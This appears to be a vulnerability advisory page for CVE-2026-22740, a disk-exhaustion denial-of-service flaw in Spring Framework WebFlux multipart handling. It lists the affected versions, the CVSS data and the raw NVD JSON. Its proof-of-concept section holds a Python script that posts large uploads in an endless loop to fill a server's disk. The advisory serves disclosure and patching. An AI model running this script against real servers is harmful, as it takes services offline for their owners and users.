Security Vulnerability Report
CVE-2026-22740 CVSS 6.5 MEDIUM

Published: 2026-04-29 12:16:18
Last Modified: 2026-05-04 14:51:28

Description

A WebFlux server application that processes multipart requests creates temp files for parts larger than 10 K. Under some circumstances, those temp files may not be deleted after the request is fully processed. This allows an attacker to consume available disk space. Older, unsupported versions are also affected.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:vmware:spring_framework:*:*:*:*:*:*:*:* - VULNERABLE (versions before 5.3.48)
cpe:2.3:a:vmware:spring_framework:*:*:*:*:*:*:*:* - VULNERABLE (6.1.0 up to, but excluding, 6.1.27)
cpe:2.3:a:vmware:spring_framework:*:*:*:*:*:*:*:* - VULNERABLE (6.2.0 up to, but excluding, 6.2.18)
cpe:2.3:a:vmware:spring_framework:*:*:*:*:*:*:*:* - VULNERABLE (7.0.0 up to, but excluding, 7.0.7)
Spring Framework (affected supported versions)
Spring Framework (older, unsupported versions)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests

# Target URL
url = 'http://target-server/upload'

# Generate data larger than 10KB to trigger temp file creation
data = {'file': ('large_file.tmp', 'A' * 20000, 'application/octet-stream')}

print("Starting DoS attack by consuming disk space...")
try:
    while True:
        # Send multipart request repeatedly
        response = requests.post(url, files=data)
        print(f"Request sent. Status: {response.status_code}")
except KeyboardInterrupt:
    print("Attack stopped.")
```

References

https://spring.io/security/cve-2026-22740 (Vendor Advisory)
https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator?vector=AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H&version=3.1 (US Government Resource)
Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-22740", "sourceIdentifier": "[email protected]", "published": "2026-04-29T12:16:18.333", "lastModified": "2026-05-04T14:51:28.313", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A WebFlux server application that processes multipart requests creates temp files for parts larger than 10 K. Under some circumstances, temp files may remain not deleted after the request is fully processed. This allows an attacker to consume available disk space.\n\nOlder, unsupported versions are also affected."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-400"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:vmware:spring_framework:*:*:*:*:*:*:*:*", "versionEndExcluding": "5.3.48", "matchCriteriaId": "23C9BFA0-DDE5-4E6D-A9E0-ECC236913DF3"}, {"vulnerable": true, "criteria": "cpe:2.3:a:vmware:spring_framework:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.1.0", "versionEndExcluding": "6.1.27", "matchCriteriaId": "FC58C148-219F-4868-B9F0-E0AF4435EF79"}, {"vulnerable": true, "criteria": "cpe:2.3:a:vmware:spring_framework:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.2.0", "versionEndExcluding": "6.2.18", "matchCriteriaId": "F317C66F-752D-40A9-AECF-5D1E51368AFE"}, {"vulnerable": true, "criteria": "cpe:2.3:a:vmware:spring_framework:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.0.0", "versionEndExcluding": "7.0.7", "matchCriteriaId": "78C5C95C-1A83-40E7-8C73-D5965E20BD06"}]}]}], "references": [{"url": "https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator?vector=AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H&version=3.1", "source": "[email protected]", "tags": ["US Government Resource"]}, {"url": "https://spring.io/security/cve-2026-22740", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}